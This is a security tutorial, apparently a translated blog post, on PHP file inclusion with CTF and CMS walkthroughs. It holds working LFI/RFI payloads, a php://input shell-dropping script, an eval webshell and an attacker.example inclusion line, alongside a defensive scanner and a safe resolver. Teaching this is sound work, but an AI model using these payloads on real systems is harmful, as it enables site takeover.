Web Vulnerabilities - File Inclusion Vulnerabilities, a Detailed Walkthrough (with Examples)

Table of contents

1. Mind map

2. File inclusion vulnerabilities
   1. Include statements by language
   2. Demonstration of the principle
   3. Root cause
   4. Detection methods
   5. Classification

3. Exploiting local file inclusion
   <unrestricted local file inclusion>
   <restricted local file inclusion>

4. Exploiting remote file inclusion
   <unrestricted remote file inclusion>
   <restricted remote file inclusion>

5. Tricks with PHP stream wrappers (protocols)
   <read file contents>
   <execute code>
   <write a one-line webshell>

6. Example: Nanyou Cup CTF

7. Example: ichunqiu Baidu Cup

8. Example: a file inclusion vulnerability in a real CMS


1. Mind map

2. File inclusion vulnerabilities

1. Include statements by language

        Every server-side scripting language has its own include statement; ASP, ASPX, JSP, PHP and so on:

<!--#include file="1.asp" -->

<!--#include file="top.aspx"-->

<c:import url="http://lthief.one/1.jsp">

<jsp:include page="head.jsp" />

<%@ include file="head.jsp" %>

<?php include('test.php'); ?>

        Whatever the language, the statement reads the named file and evaluates it as script inside the current request. When the file name comes from the client, that is the vulnerability.

2. Demonstration of the principle

        (1) Create a PHP file named include.php that reads a filename parameter from the request and passes it straight to include(); the code is shown in the figure below.

        (2) Create a file named 1.txt containing a short piece of PHP code (inside <?php ... ?> tags), as shown in the figure below.

        (3) Request include.php with the parameter filename set to 1.txt. The page shows that the PHP code inside 1.txt was executed.

        (4) Requesting 1.txt directly, by contrast, only returns its contents as plain text: the web server does not hand .txt files to the PHP interpreter. When the same file is pulled in through include(), PHP parses it and executes the code it contains.

        Summary: include() executes the contents of the named file as server-side script, regardless of that file's extension. On a PHP site it is executed as PHP, on a JSP site as JSP, and so on.

3. Root cause

        (1) An uncontrolled variable: $filename is taken directly from the request.

        (2) A dangerous function: include() (likewise include_once(), require() and require_once()).

        Neither is a problem on its own; the vulnerability is the combination of attacker-controlled input reaching a function that loads and executes a file by name.

4. Detection methods

        (1) White-box: code audit. Search for include/require calls whose argument is derived from $_GET, $_POST, $_COOKIE or other request data.

        (2) Black-box: run a vulnerability scanner, search for published vulnerabilities in the product, or inspect URL parameters for values that look like file names or paths (file=, page=, path=, template=...) and probe them with traversal sequences, a well-known file such as /etc/passwd, and PHP wrappers.
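        The same indicators can be checked from the defender's side. The following is an added example, not code from the original post: a small Python scanner that parses combined-format access-log lines (constructed sample lines, not real traffic) and flags the traversal sequences, NUL bytes, PHP wrappers and remote URLs discussed in this section, plus <?php tags in a logged field, which is the log-poisoning technique used against the CMS in section 8. The log format, parameter names and IP addresses are assumptions for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators of an inclusion attempt, checked after URL decoding. Order determines label order.
INDICATORS = [
    ("traversal", re.compile(r"\.\./|\.\.\\")),
    ("null-byte", re.compile("\x00")),
    ("php-wrapper", re.compile(r"^(php|data|phar|zip|expect)://", re.I)),
    ("remote-url", re.compile(r"^(https?|ftp)://", re.I)),
    ("sensitive-file", re.compile(r"/etc/passwd|/proc/self|win\.ini|\.log$", re.I)),
    ("php-tag", re.compile(r"<\?(php|=)", re.I)),  # a <?php tag in a logged field = log-poisoning attempt
]

# Apache/nginx "combined" log format (the constructed sample below follows it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def decode(value):
    """Decode twice so %2500 (-> %00 -> NUL) and %252e%252e%252f are seen as well."""
    return unquote(unquote(value))

def scan_value(value):
    """Return the indicator labels that match one decoded string."""
    value = decode(value)
    return [label for label, rx in INDICATORS if rx.search(value)]

def scan_request(target, user_agent=""):
    """Check every query parameter and the User-Agent of one request.
    Returns a list of (location, labels) findings, empty when nothing looks suspicious."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        labels = scan_value(value)
        if labels:
            findings.append((f"param:{name}", labels))
    ua_labels = scan_value(user_agent)
    if ua_labels:
        findings.append(("user-agent", ua_labels))
    return findings

def scan_log(lines):
    """Return [(line_number, client_ip, findings)] for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not in combined format; a real tool would count these
        findings = scan_request(match["target"], match["ua"])
        if findings:
            hits.append((number, match["ip"], findings))
    return hits

# Constructed sample log lines (not from any real server). Lines 1 and 6 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2023:12:00:01 +0000] "GET /include.php?filename=1.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2023:12:00:02 +0000] "GET /include.php?filename=../../../../etc/passwd%00 HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2023:12:00:03 +0000] "GET /include.php?filename=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2023:12:00:04 +0000] "GET /include.php?filename=http://attacker.example/shell.txt? HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2023:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 4000 "-" "<?php @eval($_POST['cmd']); ?>"
198.51.100.9 - - [10/Apr/2023:12:00:06 +0000] "GET /include.php?filename=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, ip, findings in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {number} from {ip}: {findings}")
```

        Double decoding matters: a WAF or log parser that decodes once misses %2500 and %252e payloads. The detector is deliberately noisy (a legitimate "page=about" with a traversal string in it is still worth a look); tune the parameter names and sensitive-file list to the application being monitored.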

5. Classification

        (1) Local file inclusion (LFI): only files already on the server can be included.

        (2) Remote file inclusion (RFI): files fetched over the network (http://, ftp://, ...) can be included. This is more dangerous, because the attacker controls the whole file.

        (3) Unrestricted and restricted: both kinds come in two flavours. Unrestricted means the parameter is used as-is and the payload works directly. Restricted means the code adds something to it (typically a fixed prefix or suffix such as ".html") that gets in the way, and a bypass is needed.

3. Exploiting local file inclusion

<unrestricted local file inclusion>

1. To include a file in another directory, use "../" to move up one directory level; repeat it once for each level to climb.

2. For example, suppose we want to include www.txt at the path shown in the figure below.

3. The parameter value then takes the form shown in the figure below: enough "../" to reach the common ancestor directory, followed by the path down to www.txt.

<restricted local file inclusion>

1. The code here differs from the unrestricted version by appending ".html" to the parameter.

2. Asking it to include 1.txt therefore makes it include 1.txt.html, which does not exist.

3. What can we do in this situation? Two bypass methods follow.

4. First method: %00 truncation. This requires PHP < 5.3.4 (and magic_quotes_gpc off, otherwise the NUL byte is escaped).

        Append "%00" to the file name. After URL decoding it becomes a NUL byte, which terminates the C string the file name is handed to the filesystem in; everything after it, including the appended ".html", is ignored.

        The figure below shows the code in the file being executed after %00 truncation.

5. Second method: length truncation. On Windows the path needs to exceed roughly 250 bytes; on Linux it needs to exceed 4096 bytes. Like %00 truncation this only works on old PHP releases; current versions refuse paths longer than the limit instead of silently cutting them.

        The idea is similar to padding with junk data when bypassing a WAF.

        Pad the file name with junk until it reaches the maximum path length for the server's operating system, so the ".html" appended by the code falls past the limit and is cut off.

        Append something like "/./././././././." or "..........." to the file name as the padding.

        The figure below shows the code in the file being executed after length truncation.
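        As an added example (not code from the original post), the Python below builds the three payloads from this section, shows what the page's restricted include does with them (blind concatenation of ".html"), and puts a hardened resolver next to it: an allowlist of page names, rejection of NUL bytes and path separators, and a realpath containment check. The base directory /srv/app/pages and the page names in the allowlist are assumptions for the example.

```python
import os

# Filesystem path limits the page quotes (Windows ~256 bytes, Linux 4096 bytes).
MAX_PATH = {"windows": 256, "linux": 4096}

def traversal_payload(depth, target):
    """Climb `depth` directory levels with ../ and then descend to `target`."""
    return "../" * depth + target

def null_byte_payload(path):
    """%00 decodes to a NUL byte; PHP < 5.3.4 stopped reading the file name there,
    so a suffix appended by the code (".html") was dropped."""
    return path + "%00"

def length_truncation_payload(path, os_name="linux"):
    """Pad with "/." until the name exceeds the OS path limit so the appended
    suffix lands beyond the limit and is cut off (old PHP only)."""
    limit = MAX_PATH[os_name]
    pairs = (limit - len(path)) // 2 + 2
    return path + "/." * pairs

def vulnerable_resolve(base_dir, user_value):
    """What include($_GET['filename'] . ".html") does: blind concatenation, no checks."""
    return os.path.join(base_dir, user_value + ".html")

def safe_resolve(base_dir, user_value, allowed=("home", "about", "contact")):
    """Hardened version: allowlist of page names, no separators or control bytes,
    and a final realpath check that the result stays inside base_dir."""
    if not user_value or "\x00" in user_value or "/" in user_value or "\\" in user_value:
        raise ValueError("invalid include name")
    if user_value not in allowed:
        raise ValueError("unknown page")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + ".html"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate

def is_blocked(base_dir, user_value):
    """True when safe_resolve rejects the value."""
    try:
        safe_resolve(base_dir, user_value)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    base = "/srv/app/pages"  # assumed directory the pages live in
    samples = (
        traversal_payload(4, "etc/passwd"),
        null_byte_payload(traversal_payload(2, "1.txt")).replace("%00", "\x00"),  # as PHP sees it after decoding
        length_truncation_payload("1.txt"),
    )
    for payload in samples:
        print(repr(payload[:32]), "->", vulnerable_resolve(base, payload)[:64], "| blocked:", is_blocked(base, payload))
```

        The allowlist is the real fix; the realpath check is a second line of defence for code that genuinely has to accept a path. Sanitising "../" out of the input is not enough on its own (it leaves "....//" and encoded variants), which is why the safe version refuses any separator rather than trying to strip them.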

4. Exploiting remote file inclusion

        If the code restricts inclusion to local files, no remote file inclusion vulnerability results.

        If the code imposes no restriction, and the platform configuration does not forbid including remote files, remote file inclusion becomes possible.

        PHP has a switch for this: allow_url_include (which in turn needs allow_url_fopen to be enabled). Both can be checked with phpinfo().

        When allow_url_include is on, include() accepts a URL and fetches the file from the remote address. It has defaulted to off since PHP 5.2, so in practice RFI is much rarer than LFI.

<unrestricted remote file inclusion>

1. First, unrestricted remote file inclusion.

2. Open the URL shown in the figure below; the remote file contains the string of text shown there.

3. Include the remote file, and the website executes the content of the remote file.

4. Now change the code in the remote file to backdoor code.

5. Visit again. The earlier text "ni shi gej ib!" is still printed, but the backdoor code produces no visible output. That is normal: it has been executed, it simply prints nothing.

6. Connect to the backdoor with the tool "Chopper" (China Chopper, 菜刀).

7. In the tool, enter the address and the password, set the script type to PHP, and click Add.

8. The backdoor has been connected successfully.

        Note that the remote file must be served as plain text (for example with a .txt extension): if the attacker's own server parses it as PHP, the code runs there instead of on the target, and only its output gets included.

<restricted remote file inclusion>

1. As in the local case, the code appends ".html" to the parameter.

2. Including the remote file now fails, because the request goes to .../1.txt.html on the remote server.

3. What can we do in this situation? Three bypass methods follow; each makes the appended ".html" harmless rather than removing it.

4. First: append "%20" (a space) to the URL.

5. Second: append "%23" (a "#") to the URL: the ".html" becomes a URL fragment, which is never sent to the remote server.

6. Third: append "?" to the URL: the ".html" becomes the query string, which the remote server ignores when choosing the file to serve.

5. Tricks with PHP stream wrappers (protocols)

        Recommended article: https://www.cnblogs.com/endust/p/11804767.html

<read file contents>

1. Put the php://filter wrapper in the parameter to read the 1.txt file instead of executing it, for example: php://filter/read=convert.base64-encode/resource=1.txt

2. The content comes back base64-encoded. This is not encryption: the encoding stops PHP from parsing the file's <?php ?> tags (so the source is returned rather than executed) and avoids garbled output. Decode the base64 to recover the original file. This wrapper works even when allow_url_include is off.

<execute code>

1. Set the parameter to php://input and put the PHP code to execute in the POST body (inside <?php ... ?> tags). include() then reads the request body as if it were the file. This needs allow_url_include to be on.

<write a one-line webshell>

1. As above, set the parameter to php://input and put in the POST body PHP code that writes a one-line webshell to disk, for example with file_put_contents().

2. Check the website directory: the "shell.php" backdoor has been written successfully.
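        The three wrapper tricks above, as an added Python example (not code from the original post or from the linked article): it builds the php://filter URL and decodes the base64 it returns, and builds the php://input requests for running code and for dropping the one-line shell. The endpoint http://target.example/include.php, the parameter name and the sample source file are constructed assumptions; the webshell text is the same kind of one-liner the page connects to with China Chopper.

```python
import base64
from urllib.parse import quote

def filter_read_url(base_url, param, resource):
    """php://filter returns the file base64-encoded instead of executing it.
    Works with allow_url_include=Off, because php://filter is not a remote wrapper."""
    wrapper = f"php://filter/read=convert.base64-encode/resource={resource}"
    return f"{base_url}?{param}={quote(wrapper, safe='/:=')}"

def decode_filter_response(body):
    """Recover the original file from the base64 in the response body (whitespace tolerated)."""
    return base64.b64decode("".join(body.split())).decode("utf-8", errors="replace")

def input_exec_request(base_url, param, php_statements):
    """php://input makes include() read the raw POST body, which is then parsed as PHP.
    Requires allow_url_include=On. Returns (url, post_body); the body must carry the tags."""
    url = f"{base_url}?{param}=php://input"
    body = f"<?php {php_statements} ?>"
    return url, body

def webshell(password="cmd"):
    """One-line backdoor: evaluates whatever arrives in the POST field named `password`."""
    return f"<?php @eval($_POST['{password}']); ?>"

def encoded(text):
    """base64 of a string, used to smuggle the shell past PHP quoting rules."""
    return base64.b64encode(text.encode()).decode()

def write_shell_request(base_url, param, shell_name="shell.php", password="cmd"):
    """Use php://input to run file_put_contents() that drops the webshell next to the script.
    The shell is passed base64-encoded so its quotes and tags need no escaping."""
    statement = f"file_put_contents('{shell_name}', base64_decode('{encoded(webshell(password))}'));"
    return input_exec_request(base_url, param, statement)

# Constructed source file and the response a vulnerable include.php would give for it
# (not the real files from the CTF examples in sections 6 and 7).
SAMPLE_SOURCE = "<?php\n$flag = 'flag{constructed-example}';\n?>\ntext123\n"
SAMPLE_RESPONSE = encoded(SAMPLE_SOURCE)

if __name__ == "__main__":
    target = "http://target.example/include.php"  # assumed vulnerable endpoint
    print(filter_read_url(target, "filename", "index.php"))
    print(decode_filter_response(SAMPLE_RESPONSE))
    print(*input_exec_request(target, "filename", "system('ls');"))
    print(*write_shell_request(target, "filename"))
```

        The php://input body must not be sent as multipart/form-data, since PHP then consumes the body for file uploads and php://input is empty; a plain text or urlencoded body is fine. Base64-wrapping the shell sidesteps the quoting problem of nesting a PHP string that itself contains quotes and tags.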

6. Example: Nanyou Cup CTF

        address: asdf

1. Open the website.

2. Click the description text.

3. The first guess is a file inclusion vulnerability: the last part of the URL is "file=show.php", which is very likely a file parameter.

4. Since show.php is what is being displayed, try requesting show.php directly. The website returns exactly the same content.

5. So the content of show.php is text123, and putting it in the parameter just includes it and outputs the result. From here it is not hard to confirm a file inclusion vulnerability.

6. Next, determine the operating system: change php to phP in the file name and visit again. The page returns an error, so the filesystem is case-sensitive and the server is Linux (on Windows, file names are case-insensitive and show.phP would still load).

7. So we try to run the Linux ls command, and the page returns the content shown below.

8. Running another command returns the same content, which means the site blocks this.

9. This route is not feasible, so we turn to the wrapper tricks: first try reading index.php through php://filter, and the read succeeds.

10. Decode the base64 content.

11. Paste the decoded content into a text file to view it, because the decoder's display is not very readable.

12. The flag value is obtained.

7. Example: ichunqiu Baidu Cup

1. Open the range and see the following content.

2. Read the code given on the page: if a path parameter is received, include() the received value; otherwise include phpinfo.php.

3. Verify that the analysis is right.

4. First include index.php; it is read successfully.

5. Determine the operating system -> Linux.

6. Use Linux commands to list the directory.

7. Since the last two files have already been read, read the first file to see what it contains.

8. Nothing is displayed.

9. View the page source: the flag is there, inside something the browser does not render (typically an HTML comment), so it only shows up in the raw source.

8. Example: a file inclusion vulnerability in a real CMS

1. Open the website and see the following page.

2. How did we find the vulnerability in this website?

3. First of all, we know it is ekucms, so we can search for published vulnerabilities in this CMS. If there are any, use them directly; if not, download the source and audit it ourselves.

4. There are indeed published vulnerabilities.

5. One article describes the idea: this CMS has no file upload, so only files already on the site can be included. But it does have a local file inclusion vulnerability, so we can get a one-line webshell written into the website's log, then include that log file through the vulnerability, and finally connect with a tool such as China Chopper (菜刀).

6. Copy the URL from the article into the browser, adjust it, and visit it.

7. The page returns an error message, but at this point the content of the URL has been written into the website's log.

        Explanation: the log is included as PHP, so the backdoor must still be wrapped in "<?php ... ?>" tags; anything outside the tags is printed as plain text (exactly what happened with 1.txt in the principle demonstration). For the poisoning to work, the log must also record the parameter exactly as sent, without URL-encoding or escaping the tag characters.

8. The log file is named after the date and time. First visit the URL below to include the log and trigger the backdoor.

9. Add parameters to test; the code passed in the parameter executes successfully.

10. At this point we can execute arbitrary code and have effectively taken control of the website.


Origin blog.csdn.net/weixin_62808713/article/details/129909977